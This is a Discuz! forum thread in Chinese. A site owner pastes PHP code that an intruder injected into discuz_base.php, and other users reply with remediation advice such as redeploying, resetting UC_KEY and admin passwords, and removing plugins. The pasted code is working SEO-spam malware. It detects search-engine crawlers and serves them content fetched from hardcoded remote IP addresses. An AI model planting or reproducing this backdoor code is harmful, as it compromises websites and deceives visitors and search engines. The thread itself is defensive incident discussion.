source\class\discuz\discuz_base.php文件被修改了

左右不逢缘 · 发表于 2021-4-17 16:06:00

马上注册，免费下载更多dz插件网资源。

您需要登录才可以下载或查看，没有账号？立即注册

×

source\class\discuz\discuz_base.php文件被修改了，被加了代码，如下：
set_time_limit(30);
error_reporting(0);
$tr = "stristr";
$er = $_SERVER;
function httpGet($url) {
  $ch = curl_init();

  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_HEADER, 0);

  $output = curl_exec($ch);

  curl_close($ch);

  return $output;
}
$filename1 = @end(explode('/', $url1));
function set_writeable($file_name)
{
@chmod($file_name, 0755);
}
@chmod(__FILE__, 0755);
set_writeable($filename1);
define('url', $er['REQUEST_URI']);
define('ref', $er['HTTP_REFERER']);
define('ent', $er['HTTP_USER_AGENT']);
define('site', "http://155.159.254.236:9867");
define('road', "?/" .$er['HTTP_HOST'] . url);
define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');
define('area', $tr(url, ".xml") or $tr(url, ".doc") or $tr(url, ".pdf") or $tr(url, ".txt") or $tr(url, ".ppt") or $tr(url, ".pptx") or $tr(url, ".xls") or $tr(url, ".csv") or $tr(url, ".shtml") or $tr(url,".tacc")or $tr(url,".ga")or $tr(url,".gq")or $tr(url, ".xlsx") and $tr(url, "?"));
if (area && preg_match(regs, ref)) {
echo file_get_contents('http://155.159.254.254:9368/sb.html');
exit;
}
if (preg_match(regs, ent)) {
if (area) {
      echo httpGet(site.road);
      exit;
} else {
      echo httpGet("http://155.159.254.254:9368/u.php");
      ob_flush();
      flush();
}
}

©DZ插件网所发布的一切资源仅限用于学习和研究目的；不得将上述内容用于商业或者非法用途，否则，一切后果请用户自负。
网站部分内容来源于网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑中彻底删除上述内容。如果您喜欢该程序，请支持正版软件，得到更好的正版服务。
您在本站任何的赞助购买、下载、查阅、回复等行为等均表示接受并同意签订《DZ插件网免责声明协议》。
如有侵权请邮件与我们联系处理: discuzaddons@vip.qq.com 并出示相关证明以便删除。敬请谅解！

Crystαl · 发表于 2021-4-17 16:06:54

这个需要您自行清理环境，完了升级最新版本解决。

独家记忆 · 发表于 2021-4-17 16:07:51

如果之前用的就是最新版本，一般都是底层环境有漏洞或者密码泄露，或者 Discuz! / UCenter 管理员密码 / UC_KEY 泄露导致的。

Crystαl · 发表于 2021-4-17 16:08:48

烦死了，文件全都用官方替换了，密码也改了，这个月已经中招三次了，今天又发现index.php又被改了。

Crystαl · 发表于 2021-4-17 16:08:59

1. 服务器是否沦陷了，建议重新部署一次，整个目录全面杀毒，只提取必要的部分部署，避免单独的后门文件。
2. 重新部署的时候建议使用比较新的 Linux 发行版，并正确配置写入权限。
3. 关闭掉乱七八糟的插件、模板，建议关闭卸载并删除文件，避免黑客通过后门进入。
4. UC_KEY 以及应用 AUTHKEY 建议都重置一次，避免黑客掌握这些。
5. 所有的管理员密码全部强制重置一次。